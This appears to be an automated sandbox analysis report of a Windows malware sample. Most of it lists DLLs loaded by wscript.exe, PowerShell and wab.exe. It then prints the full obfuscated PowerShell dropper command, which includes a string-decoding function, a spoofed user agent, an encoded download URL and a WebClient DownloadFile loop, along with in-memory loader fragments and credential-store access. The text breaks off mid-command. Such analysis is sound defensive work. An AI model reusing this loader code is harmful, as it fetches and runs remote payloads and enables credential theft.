                Source: C:\Windows\System32\wscript.exeSection loaded: iertutil.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: srvcli.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: netutils.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: wintypes.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: appresolver.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: bcp47langs.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: slc.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: sppc.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: pcacli.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: sfc_os.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: schannel.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mskeyprotect.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncryptsslp.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: napinsp.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: pnrpnsp.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshbth.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: nlaapi.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winrnr.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: napinsp.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: pnrpnsp.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshbth.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: nlaapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: winrnr.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dllJump to behavior
                Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: propsys.dllJump to behavior
                Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: edputil.dllJump to behavior
                Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: urlmon.dllJump to behavior
                Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: iertutil.dllJump to behavior
                Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: srvcli.dllJump to behavior
                Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: netutils.dllJump to behavior
                Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: wintypes.dllJump to behavior
                Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: appresolver.dllJump to behavior
                Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: bcp47langs.dllJump to behavior
                Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: slc.dllJump to behavior
                Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: sppc.dllJump to behavior
                Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: wininet.dllJump to behavior
                Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: winhttp.dllJump to behavior
                Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: mswsock.dllJump to behavior
                Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: iphlpapi.dllJump to behavior
                Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: winnsi.dllJump to behavior
                Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: dnsapi.dllJump to behavior
                Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: rasadhlp.dllJump to behavior
                Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: fwpuclnt.dllJump to behavior
                Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: schannel.dllJump to behavior
                Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: mskeyprotect.dllJump to behavior
                Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: ntasn1.dllJump to behavior
                Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: msasn1.dllJump to behavior
                Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: dpapi.dllJump to behavior
                Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: cryptsp.dllJump to behavior
                Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: rsaenh.dllJump to behavior
                Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: gpapi.dllJump to behavior
                Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: ncrypt.dllJump to behavior
                Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: ncryptsslp.dllJump to behavior
                Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: winmm.dllJump to behavior
                Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: rstrtmgr.dllJump to behavior
                Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: version.dllJump to behavior
                Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: wininet.dllJump to behavior
                Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: cryptsp.dllJump to behavior
                Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: rsaenh.dllJump to behavior
                Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: pstorec.dllJump to behavior
                Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: vaultcli.dllJump to behavior
                Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: wintypes.dllJump to behavior
                Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: dpapi.dllJump to behavior
                Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: msasn1.dllJump to behavior
                Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: pstorec.dllJump to behavior
                Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: msasn1.dllJump to behavior
                Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: msasn1.dllJump to behavior
                Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: msasn1.dllJump to behavior
                Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: cryptsp.dllJump to behavior
                Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: rsaenh.dllJump to behavior
                Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B54F3741-5B07-11cf-A4B0-00AA004A55E8}\InprocServer32Jump to behavior
                Source: Window RecorderWindow detected: More than 3 window changes detected
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
                Source: C:\Program Files (x86)\Windows Mail\wab.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\Outlook\OMI Account Manager\AccountsJump to behavior
                Source: Binary string: qm.Core.pdbr source: powershell.exe, 00000005.00000002.2558083418.00000000077B6000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: \??\C:\Windows\dll\System.Management.Automation.pdb source: powershell.exe, 00000005.00000002.2561261956.0000000008860000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Core\v4.0_4.0.0.0__b77a5c561934e089\System.Core.pdb5vs source: powershell.exe, 00000005.00000002.2549153346.0000000002F8D000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: System.Core.pdb source: powershell.exe, 00000005.00000002.2558083418.000000000774E000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: \??\C:\Windows\dll\System.Management.Automation.pdb source: powershell.exe, 00000005.00000002.2561261956.0000000008860000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: .Core.pdbTm source: powershell.exe, 00000005.00000002.2558083418.00000000077B6000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: System.Core.pdbk source: powershell.exe, 00000005.00000002.2558083418.000000000774E000.00000004.00000020.00020000.00000000.sdmp

                Data Obfuscation

                barindex
                Source: C:\Windows\System32\wscript.exeAnti Malware Scan Interface: ShellExecute("PowerShell", ""cls;write 'Sewerage Oplsningsaftenens ", "", "", "0");
                Source: Yara matchFile source: 00000005.00000002.2561951332.0000000009D33000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000B.00000002.3423964489.0000000004633000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: FromBase64String($Filterable)$global:Unpurchased = [System.Text.Encoding]::ASCII.GetString($Kunstkritikerens)$global:Hytteholds=$Unpurchased.substring($Omnivoracity,$Lehrman)<#Composlaers Smagssags Al
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: GetDelegateForFunctionPointer((Smock $Urinalyses $Oniscoid), (Udset @([IntPtr], [UInt32], [UInt32], [UInt32]) ([IntPtr])))$global:Nebulized = [AppDomain]::CurrentDomain.GetAssemblies()$global:Sammenbl
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: DefineDynamicAssembly((New-Object System.Reflection.AssemblyName($Noteformenes20)), [System.Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule($Amplificative, $false).DefineType($Rytteri
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: FromBase64String($Filterable)$global:Unpurchased = [System.Text.Encoding]::ASCII.GetString($Kunstkritikerens)$global:Hytteholds=$Unpurchased.substring($Omnivoracity,$Lehrman)<#Composlaers Smagssags Al
                Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "cls;write 'Sewerage Oplsningsaftenens Skrivebordsteoriers Strubelydene187 Ascon Frilgge Tlsynspligternes Efterskrifter Filterable Afgiftsobjekter Sytjerne Unpurchased Bestte Ligemand Michela enarthroses philotechnical Patternise Unsaponified31 Svampekosten Miljforbrydelserne Formastelse Kongrespaladss Ophiostaphyle Sewerage Oplsningsaftenens Skrivebordsteoriers Strubelydene187 Ascon Frilgge Tlsynspligternes Efterskrifter Filterable Afgiftsobjekter Sytjerne Unpurchased Bestte Ligemand Michela enarthroses philotechnical Patternise Unsaponified31 Svampekosten Miljforbrydelserne Formastelse Kongrespaladss Ophiostaphyle';If (${host}.CurrentCulture) {$Sulphoacetic++;}Function Ivywood($Oversteges){$Swelly=$Oversteges.Length-$Sulphoacetic;$Undfangelsestidspunkter='SUBsTRI';$Undfangelsestidspunkter+='ng';For( $Maladministers=1;$Maladministers -lt $Swelly;$Maladministers+=2){$Sewerage+=$Oversteges.$Undfangelsestidspunkter.Invoke( $Maladministers, $Sulphoacetic);}$Sewerage;}function Unisexes($Dobbelterklringens){ . ($Botanikkerne) ($Dobbelterklringens);}$Fyldepenneblk=Ivywood 'aM.oRz i l lTaR/B5 . 0H A(eWFi n,dFoMwEs, .NTT, ,1B0 .,0 ;O MW,i n,6H4,; xD6S4S;R r vF:K1.2 1R. 0L)d ,G,eHc.kAo,/.2.0K1.0 0,1V0 1. SF imrDe fAo x,/a1F2.1J. 0T ';$Kilders=Ivywood 'SURs e,rT- AVgBe n tN ';$Ascon=Ivywood 'RhDt.t p.sR:M/ / c oPn t.e mCeSgEac. cSo.mC.Od o / N eSwV/ N eaw /.PIuTsCt eAn eP.TlYpPkT ';$Marijanne=Ivywood ' > ';$Botanikkerne=Ivywood '.iPe x. ';$Kandidaternes='Efterskrifter';$Spindelvvs = Ivywood ' e c h.oT %Fa pHpSd.a,tFa.% \ K aNs.i nSoOeUr,n.e ..P r i, ,&H&E ePc.h oT tB ';Unisexes (Ivywood 'E$Tg l,oPbfa l :,BBe,dMr eNv iCdMeDnAdUe =.(OcKm,d /.c $LSLp,iTn d e,lRv v s ) ');Unisexes (Ivywood ',$ g.l o,bCa l,: SOt r ubb e,l yBd e nLe 1.8,7 =s$,Ads c.o,nT..s pBlMi.t ( $ M.aCr.iSjOa n.n ef)O ');Unisexes (Ivywood ',[rN e tS.ESSeGr.v i c eRP,o.iFnktUM.a nSa.g e rM]E:T: SpeEcBu rUiAt,ySPMr,oTtUoGcAo l ,=M [kN,eAtE.SS.e c u rUiEt ymPCrSo tSoAc oDlTTOyPpUeT].:,:BTElFsg1S2B ');$Ascon=$Strubelydene187[0];$Utilitarianises= (Ivywood '.$,g l o.b aFlI:CCToLrStniMcTiPpBeHtRaVlS=.N eywH-SO bBjFeMc t. AS,y,sCtPe.m . N e t .RWMeHbUCMl,i,ern t');$Utilitarianises+=$Bedrevidende[1];Unisexes ($Utilitarianises);Unisexes (Ivywood ' $KCRo r t,iAc i pSe t,aVlS.FHVePa.d,eSr s [,$AK ibl dSe r s ]K=.$ F y.l,d ePp,e n nme bSlSk, ');$Confrere=Ivywood '.$.C oTr tSiWcSiHp.e,tEa lG.CD o wFn,l ooa.d F i l.e.( $NAUs,c,o nB, $ FPoJr,m,aMs.t,e.lUsSeP)P ';$Formastelse=$Bedrevidende[0];Unisexes (Ivywood 'O$,g,l.o bBa lU:DV i r iRlLi tGedtReLn =K(.Tfe,s tI-CPAa tEhD S$SFRogrTmHa s tneWlVsEeT)F ');while (!$Viriliteten) {Unisexes (Ivywood '.$pgNlOo braAl,:PBNiMdne nPtDe d =W$ t.rMuNeN ') ;Unisexes $Confrere;Unisexes (Ivywood ',SBtMa r,tS- SKl e eUpD .4m ');Unisexes (Ivywood ' $AgBl.o.b.aTl : VSi.rDi l iHt,e t.eQnT=A(DT eVsTtU-.P,a toh, ,$DF,oTr,m aPsGt.e lTsue.)E ') ;U
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "cls;write 'Sewerage Oplsningsaftenens Skrivebordsteoriers Strubelydene187 Ascon Frilgge Tlsynspligternes Efterskrifter Filterable Afgiftsobjekter Sytjerne Unpurchased Bestte Ligemand Michela enarthroses philotechnical Patternise Unsaponified31 Svampekosten Miljforbrydelserne Formastelse Kongrespaladss Ophiostaphyle Sewerage Oplsningsaftenens Skrivebordsteoriers Strubelydene187 Ascon Frilgge Tlsynspligternes Efterskrifter Filterable Afgiftsobjekter Sytjerne Unpurchased Bestte Ligemand Michela enarthroses philotechnical Patternise Unsaponified31 Svampekosten Miljforbrydelserne Formastelse Kongrespaladss Ophiostaphyle';If (${host}.CurrentCulture) {$Sulphoacetic++;}Function Ivywood($Oversteges){$Swelly=$Oversteges.Length-$Sulphoacetic;$Undfangelsestidspunkter='SUBsTRI';$Undfangelsestidspunkter+='ng';For( $Maladministers=1;$Maladministers -lt $Swelly;$Maladministers+=2){$Sewerage+=$Oversteges.$Undfangelsestidspunkter.Invoke( $Maladministers, $Sulphoacetic);}$Sewerage;}function Unisexes($Dobbelterklringens){ . ($Botanikkerne) ($Dobbelterklringens);}$Fyldepenneblk=Ivywood 'aM.oRz i l lTaR/B5 . 0H A(eWFi n,dFoMwEs, .NTT, ,1B0 .,0 ;O MW,i n,6H4,; xD6S4S;R r vF:K1.2 1R. 0L)d ,G,eHc.kAo,/.2.0K1.0 0,1V0 1. SF imrDe fAo x,/a1F2.1J. 0T ';$Kilders=Ivywood 'SURs e,rT- AVgBe n tN ';$Ascon=Ivywood 'RhDt.t p.sR:M/ / c oPn t.e mCeSgEac. cSo.mC.Od o / N eSwV/ N eaw /.PIuTsCt eAn eP.TlYpPkT ';$Marijanne=Ivywood ' > ';$Botanikkerne=Ivywood '.iPe x. ';$Kandidaternes='Efterskrifter';$Spindelvvs = Ivywood ' e c h.oT %Fa pHpSd.a,tFa.% \ K aNs.i nSoOeUr,n.e ..P r i, ,&H&E ePc.h oT tB ';Unisexes (Ivywood 'E$Tg l,oPbfa l :,BBe,dMr eNv iCdMeDnAdUe =.(OcKm,d /.c $LSLp,iTn d e,lRv v s ) ');Unisexes (Ivywood ',$ g.l o,bCa l,: SOt r ubb e,l yBd e nLe 1.8,7 =s$,Ads c.o,nT..s pBlMi.t ( $ M.aCr.iSjOa n.n ef)O ');Unisexes (Ivywood ',[rN e tS.ESSeGr.v i c eRP,o.iFnktUM.a nSa.g e rM]E:T: SpeEcBu rUiAt,ySPMr,oTtUoGcAo l ,=M [kN,eAtE.SS.e c u rUiEt ymPCrSo tSoAc oDlTTOyPpUeT].:,:BTElFsg1S2B ');$Ascon=$Strubelydene187[0];$Utilitarianises= (Ivywood '.$,g l o.b aFlI:CCToLrStniMcTiPpBeHtRaVlS=.N eywH-SO bBjFeMc t. AS,y,sCtPe.m . N e t .RWMeHbUCMl,i,ern t');$Utilitarianises+=$Bedrevidende[1];Unisexes ($Utilitarianises);Unisexes (Ivywood ' $KCRo r t,iAc i pSe t,aVlS.FHVePa.d,eSr s [,$AK ibl dSe r s ]K=.$ F y.l,d ePp,e n nme bSlSk, ');$Confrere=Ivywood '.$.C oTr tSiWcSiHp.e,tEa lG.CD o wFn,l ooa.d F i l.e.( $NAUs,c,o nB, $ FPoJr,m,aMs.t,e.lUsSeP)P ';$Formastelse=$Bedrevidende[0];Unisexes (Ivywood 'O$,g,l.o bBa lU:DV i r iRlLi tGedtReLn =K(.Tfe,s tI-CPAa tEhD S$SFRogrTmHa s tneWlVsEeT)F ');while (!$Viriliteten) {Unisexes (Ivywood '.$pgNlOo braAl,:PBNiMdne nPtDe d =W$ t.rMuNeN ') ;Unisexes $Confrere;Unisexes (Ivywood ',SBtMa r,tS- SKl e eUpD .4m ');Unisexes (Ivywood ' $AgBl.o.b.aTl : VSi.rDi l iHt,e t.eQnT=A(DT eVsTtU-.P,a toh, ,$DF,oTr,m aPsGt.e lTsue.)E ') ;U
                Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "cls;write 'Sewerage Oplsningsaftenens Skrivebordsteoriers Strubelydene187 Ascon Frilgge Tlsynspligternes Efterskrifter Filterable Afgiftsobjekter Sytjerne Unpurchased Bestte Ligemand Michela enarthroses philotechnical Patternise Unsaponified31 Svampekosten Miljforbrydelserne Formastelse Kongrespaladss Ophiostaphyle Sewerage Oplsningsaftenens Skrivebordsteoriers Strubelydene187 Ascon Frilgge Tlsynspligternes Efterskrifter Filterable Afgiftsobjekter Sytjerne Unpurchased Bestte Ligemand Michela enarthroses philotechnical Patternise Unsaponified31 Svampekosten Miljforbrydelserne Formastelse Kongrespaladss Ophiostaphyle';If (${host}.CurrentCulture) {$Sulphoacetic++;}Function 